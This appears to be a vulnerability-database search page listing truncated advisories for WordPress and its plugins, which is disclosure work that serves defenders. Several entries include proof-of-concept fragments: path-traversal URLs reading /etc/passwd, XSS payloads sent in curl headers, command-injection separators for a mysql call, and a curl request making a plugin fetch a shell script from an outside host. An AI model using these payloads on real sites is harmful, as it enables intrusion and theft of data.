4359 matches found
Ajax Load More <= 2.8.1.1 - Authenticated File Upload & Deletion
Authenticated file upload in file ajax-load-more/admin/admin.php file, in the function almsaverepeater. The variable $f is set to a predictable PHP file path, and then the content of the variable $c is written into that file. The following code proves that this second variable is also set from...
wordpress vertical image slider plugin < 1.2 - Cross-Site Scripting & CSRF
The lack of CSRF check and sanitisation could allow attackers to perform Cross-Site Scripting attack against logged in administrator, as well as upload arbitrary files XSS via CSRF: alert"XSS"' alert"XSS"' setTimeout'form1.submit', 1; Upload file via CSRF:...
MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
Plugin is still affected and has been closed. Typical local file inclusion vulnerability: from downloadpage.php: I've tried to get RCE but didn't have success reading from /proc/self/environ or /var/log/apache2/access.log include: Failed opening '/proc/self/environ' for inclusion...
WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
The following payload placed in a page or post does not work in comments: TEST!!!caption width="1" caption='Click me...
EZ SQL Reports <= 4.11.33 - Authenticated Arbitrary File Download
The plugin allows a WordPress site administrator or collaborator to download arbitrary files from the host file system though the plugin functionality of downloading .sql, .sql.zip or .sql.gz files created by the WordPress administrator. The file name to download is not sanitized and path travers...
EZ SQL Reports <= 4.11.33 - Authenticated Arbitrary Code Execution
There are several calls to "passtthru" in the code, one of them is receiving the username, password, database name and host from the $POST arguments, so you can inject in every of this parameter the ";" character or others like "&&" or "||" to execute other distinct commands to "/usr/bin/mysql"...
PowerPress Podcasting < 6.0.5 - Authenticated Cross-Site Scripting (XSS)
By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged in user’s session by stealing cookies. This means that the malicious hacker can change the logged in user’s password and invalidate the session of the victim while the hacker maintains access. 1. Logon into any...
Csv2WPeC Coupon <= 1.1 - Unauthenticated Remote File Upload
The code in csv2wpecCouponFileUpload.php does not properly sanitize user input, it checks the file mime-type for type x-php but this can be tricked when using the short code for "; $uploadfile="/var/www/s.pht"; $ch =...
Royal Slider <= 3.2.6 - Authenticated Cross-Site Scripting (XSS)
The vulnerability exists due to insufficient sanitation of user-supplied data in "rstype" HTTP GET parameter when creating / editing a slider. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of...
WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The wp-symposium WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/wp-symposium/getalbumitem.php?size=alert/xss/...
Thumbnail Carousel Slider < 1.0.1 - Authenticated Shell Upload & CSRF
The original advisory states that this vulnerability is exploitable with editor and author roles but this is incorrect. Only the administrator role by default can trigger this vulnerability. However, CSRF on the image upload form makes this exploitable by a malicious actor. Create a file named...
SEO Redirection < 2.9 - Authenticated Reflected Cross-Site Scripting (XSS)
The plugin was affected by an Authenticated Reflected Cross-Site Scripting XSS security vulnerability in its settings page, via the search GET parameter https://example.com/wp-admin/options-general.php?page=seo-redirection.php&tab=posts&search=%22+onmouseover%3Dalert%281%29+%3E...
WP Google Map Plugin < 3.0.0 - CSRF to Authenticated Cross-Site Scripting (XSS)
The lack of CSRF Protection could allow attackers to perform XSS attack against logged in administrators. ' / ' /...
Google Adsense & Hotel Booking <= 1.0.5 - Open Proxy
Plugin is still affected and has been closed. The code in ./plugin/google-adsense-and-hotel-booking/proxy.php allows an arbitrary user to proxy POST requests though the host site. This may allow attackers to hide attacks, or DoS a site if the POST request is pointed back at itself causing a loop...
WP-Polls <= 2.70 - Stored Cross-Site Scripting (XSS)
The /wp-admin/admin.php?page=wp-polls%2Fpolls-add.php page is vulnerable to XSS within the pollqquestion and pollaanswers parameters. Add a new poll with the question or answer as...
Hide My WP <= 4.53 - Stored-Cross Site Scripting (XSS)
An attacker can make a fake attack attempt which will be logged, and can inject JavaScript. curl --referer 'you are using bad filtering for input ript alert"XSS here" ript; :; ;' http://example.com...
WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
Wordpress plugin wp-symposium version 15.5.1 and probably all existing previous versions suffers from an unauthenticated SQL Injection in getalbumitem.php, parameter 'size'. The issue is exploitable even if the plugin is deactivated. PoC URL :...
MP3-jPlayer <= 2.4.2 - Full Path Disclosure
The download.php code allows arbitrary users to disclose path information on WordPress sites with this plugin installed. 120 $info = " 121 Get: " . $mp3 . " 122 Sent: " . $sent . " 123 File: " . $file . " 124 Open: " . $SERVER'DOCUMENTROOT' . $fp . " 125 Root: " . $rooturl . " 126 pID: "...
Job Manager <= 0.7.22 - Unauthenticated Stored Cross-Site Scripting (XSS)
The Job Manager WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting XSS security vulnerability. Go to the job listings page /index.php/jobs/apply/, then click on "send through your résumé", add the payload '" to the email field. The JavaScript will be executed on the...
Admin Pack by SITE CASEIRO <= 1.1 - Authenticated Stored Cross-Site Scripting (XSS)
The admin-pack-by-site-caseiro WordPress plugin was affected by an Authenticated Stored Cross-Site Scripting XSS security vulnerability...
Ninja Forms <= 2.9.21 - Authenticated Reflected Cross-Site Scripting (XSS)
The Ninja Forms Contact Form – The Drag and Drop Form Builder for WordPress WordPress plugin was affected by an Authenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-admin/admin.php?page=nf-processing&title=alert123;...
Altos Connect Widget <= 1.3.0 - Unauthenticated Cross-Site Scripting (XSS)
The altos-connect WordPress plugin was affected by an Unauthenticated Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/altos-connect/jquery-validate/demo/demo/captcha/index.php/"alert1...
recent-backups <= 0.7 - Remote File Download
Plugin is still affected and has been closed. The code in download-file.php does not verify if the user is logged in or sanitize which files can be downloaded. This vulnerability can be used to download sensitive system files, such as the Linux passwd file. $ curl -v...
simple-image-manipulator <= 1.0 - Remote File Download
Plugin is still affected and has been closed. In ./simple-image-manipulator/controller/download.php no checks are made to authenticate the user or sanitize input when determining file location. $ curl...
Hide My WP <= 4.51.1 - Stored Cross-Site Scripting (XSS)
An attacker can make a fake attack attempt, with a JavaScripting payload, which will be logged by the plugin, resulting in XSS. The attacker also can spoof their IP address in the logs by setting the X-FORWARDED-FOR header. curl --referer ' // :; ;' --header 'X-FORWARDED-FOR: 8.8.8.8'...
Music Store <= 1.0.14 - Referer Header Open Redirect
The Music Store – WordPress eCommerce WordPress plugin was affected by a Referer Header Open Redirect security vulnerability. GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language:...
WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
Description Authenticated Cross-Site Scripting XSS in post/page text editor mode. Editor user and up. link...
wptf-image-gallery 1.0.3 - Remote File Download
Plugin is still affected and has been closed. The ./wptf-image-gallery/lib-mbox/ajaxload.php code doesn't sanitize user input or check that a user is authorized to download files. This allows an unauthenticated user to download sensitive system files: 1 $ curl...
Download Manager <= 2.7.94 - Authenticated Stored XSS
The stored XSS vulnerability allows any authenticated user to inject malicious code via the name of the uploaded file: Example: .jpg The vulnerability exists because the file name is not properly sanitized and this can lead to malicious code injection that will be executed on the target’s browser...
Candidate Application Form <= 1.3 - Unauthenticated Arbitrary File Download
Plugin is still affected and has been closed. The code in downloadpdffile.php does not do any sanity checks, allowing a remote attacker to download sensitive system files. $ curl...
Fast Image Adder <= 1.1 - Unauthenticated Remote File Upload
The fast-image-adder WordPress plugin was affected by an Unauthenticated Remote File Upload security vulnerability. $ curl http://www.example.com/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url&url=http://sitewithshellstodl/shell.php Shell location is reported back t...
IBS Mappro <= 0.6 - Directory Traversal
The ibs-mappro WordPress plugin was affected by a Directory Traversal security vulnerability. http://www.example.com/wp-content/plugins/ibs-mappro/lib/download.php?file=/etc/passwd...
Floating Social Bar <= 1.1.5 - Cross-Site Scripting (XSS)
The Floating Social Bar WordPress plugin was affected by a Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-admin/admin-ajax.php?action=fsbsaveorder&items1="alert"XSS";...
NewStatPress <= 1.0.4 - SQL Injection
The Search functionality is susceptible to a SQL Injection attack due to usage of user input without sanitation. In particular, at line 98 of 'includes/nspsearch.php'. Utilising a specially crafted SQL query, we can trigger disclosure of user hashes through an IMG tag as the data channel. The...
NewStatPress <= 1.0.4 - Reflected Cross-Site Scripting (XSS)
The NewStatPress plugin utilizes on lines 28 and 31 of the file ‘includes/nspsearch.php’ several variables from the $GET scope, without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to trigger ...
Image Export <= 1.1.0 - Directory Traversal
The image-export WordPress plugin was affected by a Directory Traversal security vulnerability. $ curl http://www.example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd...
WP e-Commerce Shop Styling <= 2.5 - Local File Inclusion
The code in ./wp-ecommerce-shop-styling/includes/download.php does not sanitise user input to prevent sensitive system files from being downloaded. You'll have to rename the download file via mv -- -..-..-..-..-..-..-..-..-etc-passwd passwd as the filename is set to the download filename with pat...
StageShow <= 5.0.8 - Open Redirect
The StageShow WordPress plugin was affected by an Open Redirect security vulnerability. http://www.example.com/wp-content/plugins/stageshow/stageshowredirect.php?url=http%3A%2F%2F2buntu.com...
Swim Team <= v1.44.10777 - Local File Inclusion
The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input from downloading sensitive system files. $ curl...
MDC YouTube Downloader <= 2.1.0 - Local File Inclusion
The MDC YouTube Downloader WordPress plugin was affected by a Local File Inclusion security vulnerability. http://www.example.com/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd...
WP-CopyProtect <= 3.0.0 - CSRF & Stored Cross-Site Scripting (XSS)
The WP-CopyProtect Protect your blog posts plugin for WordPress is vulnerable to a Persistent XSS attack on the settings screen, due to a lack of sanitation of user input, and lack of Cross-Site Request Forgery CSRF token nonce. alert1'/ document.getElementById"form".submit;...
Multiple Themes - Privilige Escalation
The themes suffer from a privilege escalation vulnerability, any authenticated user can trigger this vulnerability due to weak permissions checking. An attacker can update options, such as changing user's default role, registration state and others, which may lead to executing commands/code on th...
WP Mobile Detector <= 3.2 - Stored Cross-Site Scripting (XSS)
The WP Mobile Detector plugin exposes the AJAX action ‘websitezoptions’ to all registered users on line 78 of wp-mobile-detector/websitez-wp-mobile-detector.php. Providing specially crafted form values will result in a Persistent XSS attack on Mobile visitors. import requests s = requests.session...
wp-instance-rename <= 1.0 - Arbitrary File Download
The wp-instance-rename WordPress plugin was affected by an Arbitrary File Download security vulnerability. url --data "dbname=wp&dumpfname=/etc/passwd&backupfolder=." http://www.example.com/wp-instance-rename/mysqldumpdownload.php -o p.zip...
Erident Custom Login & Dashboard 3.4-3.4.1 - Stored Cross-Site Scripting (XSS)
The Erident Custom Login and Dashboard plugin exposes a call to the updateoption method, when a specific POST field is posted to the plugins setting screen. No CSRF token is used, and as such if an Administrative user can be tricked into visiting a site with a malicious form, it is possible to...
Ultimate Member 1.2.98-1.2.994 - Reflected Cross-Site Scripting (XSS)
The Ultimate Member plugin utilizes the Redux Framework. The Redux Framework includes a script named ‘class.p.php’, which acts as a HTTP proxy. Utilizing this script, it is possible to trigger a Reflected XSS attack, by loading data from a location controlled by the attacker. The data from this...
Users to CSV <= 1.4.5 - Cross-Site Request Forgery (CSRF)
The users-to-csv WordPress plugin was affected by a Cross-Site Request Forgery CSRF security vulnerability. http://www.example.com/wp-admin/users.php?page=users2csv.php&csv=true&table=users http://www.example.com/wp-admin/users.php?page=users2csv.php&csv=true&table=comments...
Yoast SEO <= 2.1.1 - Authenticated Stored DOM XSS
The "snippet preview" functionality of the Yoast WordPress SEO plugin was susceptible to cross-site scripting in versions before 2.2. Vulnerable URL: /wp-admin/post-new.php?posttitle= Vulnerable Code wordpress-seo/js/wp-seo-metabox.js: function ystcleanstr if str == '' || str == undefined return...
Zip Attachments <= 1.1.4 - Arbitrary File Download
The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file. http://www.example.com/wp-content/plugins/zip-attachments/download.php?zafile=../../../../../etc/passwd&zafilename=passwd...
Smart Website Tools by AddThis 4.0.6-5.0.2 - Stored XSS
The Smart Website Tools by AddThis plugin exposes an AJAX function called 'atasyncloading' in 'addthis/addthis-for-wordpress.php'. Access to this function is restricted to Registered users, however is not restricted to Administrative users, meaning that anyone with an account on the target site c...